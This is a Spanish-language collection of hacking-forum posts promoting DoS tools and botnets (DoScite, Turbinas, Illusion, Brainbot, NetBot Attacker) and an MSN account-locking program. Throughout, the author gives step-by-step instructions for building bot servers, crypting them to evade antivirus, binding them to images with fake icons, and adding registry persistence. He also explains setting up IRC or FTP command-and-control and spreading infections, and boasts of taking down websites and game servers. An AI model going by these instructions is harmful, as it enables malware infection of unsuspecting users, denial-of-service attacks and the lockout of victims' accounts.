DoScite es un programa nuevo que sirve para realizar ataques DOS a webs, funciona casi igual que el Turbinas by volks, conectando y desconectando sockets.

Pero al parecer este es mas efectivo, lo probe con 2 webs medianas y las tiro a las 2 en unos 20 segundos, solo con 1M de conexion, imaginense si se juntan varios para atacar una web...


Inicialmente DoScite estaba a la venta, pero el programador fakundo nos creo una licencia gratuita ilimitada para todos los usuarios de troyanosyvirus.

Veamos las distintas funciones:

URL: Aquí es donde se debe poner la url del host a atacar, DoScite soporta webs con puertos que no sean 80, para especificar otro puerto ponemos la dirección con : (Por ejemplo http://miweb.com:250/index.html, es este caso el puerto es 250)

Browser: En este campo se debe poner la variable del supuesto navegador que utilizamos, esto sirve para lograr más creencia de parte del servidor que la petición es real.
ExtraHeaders: Este es el campo donde se ponen headers personalizados en la petición http, por ejemplo las cookies.

Connection: Aquí va el tipo de comportamiento que tendrá el programa, si ponemos Open o Keep-Alive todos los sockets permanecerán abiertos y podrán enviar ilimitadas peticiones sin tener que ser reconectado, en cambio si ponemos Close cada socket se cerrará cuando la petición sea enviada correctamente.

Sockets: En este sector se debe especificar el número de sockets que utilizaremos en el ataque.

Intervalo: En este sector se debe especificar el intervalo en segundos en que actuará cada socket. Se puede especificar 1 decimal, por ejemplo 0.5 o 1.2.

Petición personalizada: Esta opción permite personalizar la petición que enviaremos permitiéndonos utilizar el cabezal POST en el header o cualquier otro que deseemos.

Realizar un minintervalo: Si marcamos esta opción se realizara un intervalo de 2 milisegundos por socket.

Actualizado: salio una nueva version llamada Dosers Pack, que incluye la version 3.2 del Doscite y un TCP DOS Tool, dentro del rar se incluyen todas las dependencias.

Descarga:
DoSers Pack by Faku (rapidshare)
DoSers Pack by Faku (mediafire)

DoScite 3.1 (Rapidshare)
DoScite 3.1 (Mediafire)

El Illusion es otro bot proveniente de Rusia, se caracteriza por sus multiples comandos para ataques de denegacion de servicio y por la capacidad de ser controlado por web y por irc (soporta 2 servidores web y 2 servidores IRC).
El bot hoy en dia es algo antiguo, por lo que al bot puro lo detectan hasta los ciegos, pero todavía sigue funcionando muy bien, es muy estable, y fácil de encriptar.

Características principales:
» Puede ser controlado por IRC y por HTTP
» Proxy functionality (Socks4, Socks5)
» FTP service
» MD5 support for passwords
» Rootkit
» Code injection
» Colored IRC messages
» XP SP2 Firewall bypass
» DDOS capabilities

Su configuracion es muy simple, solo abrimos el Build.exe, damos click en edit binary y seleccionamos nuestro BOTBINARY.exe, que viene en la descarga.
Después lo configuramos con algun servidor irc y canal cualquiera, cambian la pass del bot, y dejan todo como esta si no saben para que es.
Eso es todo, ya tienen su BOTBINARY listo para encriptar y comenzar a propagarlo, en mi caso yo lo encripte con el AC crypter y funciono perfecto, lo pueden ver en la imagen siguiente.



Para controlar nuestra botnet entramos al MIRC u otro cliente IRC, agregamos el server y canal que pusimos cuando creamos el server y luego ingresamos, se podran ver todos los bot como en la imagen anterior y desde ahi podemos controlarlos.
Se pone siempre un ! antes del comando, y al prinsipio deben loguearse con el comando login (!login botpass) para que los bot le obedescan.
Pueden ver todos los comandos aqui y el video de root3d aqui para guiarse un poco en lo que es control de una botnet.

Descarga:
illusion Bot V1.1
illusion Bot V1.1

(No pude analizar completamente si los archivos estan desinfectados, de todas formas yo lo abri en mi pc y no me paso nada todavia XD)

Comandos:
Comandos illusion Bot V1.1

Si se fijan bien en la 2º imagen y parte de la 1º, tienen todos los datos para entrar a esa mini botnet mia, el que quiera los bot que se los lleve, no tengo problema.

A pedido de los usuarios posteo este bot, es muy facil de configurar y es bastante estable, es con el bot que yo empese.
Una de sus mejores caracteristicas es su propia propagacion, tiene propagacion por p2p, irc, lan, y sql.
Incluye un binder, un compresor upx, posibildad de cambiar el icono y metodos de inicio.

Explico un poco como se configura:

Irc server:Aqui colocamos la direccion del servidor irc que utilizemos, recomiendo utilizar una cuenta no-ip o cdmon que redireccione al servidor para no perder los bot por si cierran el servidor o los banean, generalmente los banean muy rapido si tienen muchos bots, pueden buscar servidores irc en google.

Irc port: El puerto del servidor irc, generalmente 6667

Channel: Pongan el canal donde se conectaran los bot, por ejemplo #botnet

Fixed name: Los nick que tendran los bot cuando se conecten al servidor, por ejemplo Bot-

Masternick:
Esto es importante, es el nick que usaran ustedes para conectarse, es el que deben seleccionar en el cliente irc, si no se conectan con ese nick los bot no les daran bola. Ej: mauro892

Password: Su pasword para conectarse, es el que usaran para conectarse cuando introduscan el comando !login. Ej: 123465

Bind file: Seleccionamos el archivo con el que queremos juntar el bot, por ejemplo una foto.

Change icon: Seleccionamos el icono del bot, por ejemplo el de una imagen jpg

Upx: Marcamos para comprimir el bot

Startup: Introduciomos un nombre para una clave de registro (por ejemplo winr32), y el nombre del ejecutable para instalar en la carpeta de win (ej bootload)

Eso es todo lo basico para que el server funcione, ahora le damos build y a infectar, Despues explicare los metodos de spread para que el bot se propague.

Para ver los comandos del bot introducen !commands, en el cliente irc.
Tambien pueden leer el readme del archivo para ver las caracteristicas del bot, y para ver mas detalladamente como se introducen los comandos.
si tienen alguna duda con respecto a los comandos lo comentan aca y les contesto.

Descarga:
Brainbot V1.5 (megaupload)
Brainbot V1.5 (rapidshare)
Brainbot v1.5 (trojanfrance, sin dependencias)

Chau MSN es un programa creado por arhack, basado en el source de kizar, lo que hace es bloquear cuentas de msn completamente mientras el programa este activo.

Para bloquear una cuenta lo unico que tienen que hacer es colocar el msn de la victima y poner bloquear cuenta, esperar que termine de cargar todo y dejarlo abierto al programa, o minimizado. La proxima ves que la victima intente entrar al msn le saldra un cartel como este, y no podra iniciar secion:



Hay que tener en cuenta que la cuenta permanesera bloqueada mientras el programa este abierto y en el estado cuenta bloqueada.
Si se intenta bloquear una cuenta de alguien que este online, esta se bloqueara pero cuando cierre secion y vuelva a iniciarla, No hara que cierre secion.

Funcionamiento
El funcionamiento del programa es muy simple, lo que se hace es loguearse con la cuenta que se puso con passwords incorrectos, entonces el servidor de hotmail bloquea la cuenta para evitar que se realizen ataques por fuerza bruta.

ACTUALIZADO 16/04/08

Codigo fuente
Chau MSN esta programado en visual basic y es de codigo abierto desde ahora, ya libere el codigo fuente para que vean como funciona mas o menos y para todos los que quieran modificar el programa. Pueden ir haciendo las modificaciones que quieran y me lo van pasando asi voy actualizando el programa, no nesesariamente tiene que bloquear cuentas.

Les dejo una captura del VB


Descarga:
Chau MSN v1.0 (miarroba)
Chau MSN v1.0 (rapidshare)
Chau MSN v1.0 (megaupload)

Source Chau MSN v1.0 (miarroba)
Source Chau MSN v1.0 (rapidshare)

NetBot Attacker es una herramienta capaz de tirar servidores realizando ataques DDOS de distintos tipos con todos tus bot.
Obiamente la potencia de este ataque dependera principalemte de la cantidad de bots que tengas.
Lo bueno de esta botnet es que tiene un aspecto "visible" en comparacion de las otras que trabajan con servidores irc. Tambien incluye unas opciones colectivas, para descargar y ejecutar archivos, abrir determinada pagina web, apagar todas las pcs, etc.

Para configurar el servidor primero debemos ir hacia el icono del IE en la parte superior izquierda y configurar todo con nuestros datos de conexion ftp, nuestra ip y puertos.

Un ejemplo utilizando miarroba.com
Ftp server ip: 89.17.220.55 (esa es la ip del ftp miarroba.com)
Local ip: troyanosyvirus.no-ip.org (mi ip)
Path file upload: /ip.jpg (dejenlo como esta)
Ftp user: troyanosyvirus (si mi web es troyanosyvirus.miarroba.com) port: 21
Ftp pass: 123456 (mi password para ingresar) port: 80

Listo ahora le damos update (el primer boton, no el segundo)

Despues hacemos clic en el casco del guerrero y colocamos la direccion donde esta el supuesto archivo ip.jpg, en mi caso como al principio puse solo /ip.jpg tendre que poner http://troyanosyvirus.webcindario.com/ip.jpg, luego click en create.

Lo unico que faltaria seria seleccionar el puerto para ello nos vamos a la "K" y seleccionamos el puerto que colocamos antes, en mi caso 80.
El servidor (server.exe) esta en la carpeta donde tienen el cliente y esta listo para ser enviado, no se olviden de dejarlo indetectable.

Asi les deberia quedar todo para que funcione bien:


Descarga:
NetBot Attacker 1.4 english version

Turbinas by volks es un programa algo viejito (2006) utilizado para tirar servidores. Con este programita pude tirar servers de varios juegos online, como mu online, counter strike 1.6, ragnrok, algunas webs pequeñas, etc (todo a modo de prueba,)..
Se preguntaran que tipo de servidores pueden tirar, bueno pensando un poco se daran cuenta que depende de la conexion de internet del atacante y de la victima, de que tipo de server se trate, de las protecciones, etc. No vallan a querer intentar tirar google, ni servidores grandes, que no le haran ni cosquillas.

Imagen de turbinas

Como funciona?

Forma Técnica:
“Es un programa que conecta y desconecta sockets, en un milisegundo conecta y desconecta, osea que 1000 milisegundos = 1 segundo multiplicado por 5, genera 5.000 conexiones por segundo al servidor , lo cual hace que el mismo colapse.”

Forma no técnica:
“Suponga que hay una puerta grande (10MB de host de un servidor), y que 5.000 personas quieren entrar y salir en un segundo, entonces al no poder colapsa el servidor.”

Como se usa?
Facil, tienen que seleccionar el IP, y el puerto, Y ir activando las turbinas (tambien pueden seleccionar el intervalo cuanto menos intervalo mas rapido conectaran y conectaran (esta puesto en 100 milisegundos).
Si elijen cualquier IP y cualquier Servidor, no les dara error ya que esta compilado con "Error resume Next" de Visual basic, para que no den errores de overflow para los sockets.

Descarga:
Turbinas By Volks 1.0
Turbinas By Volks 1.0 (mirror)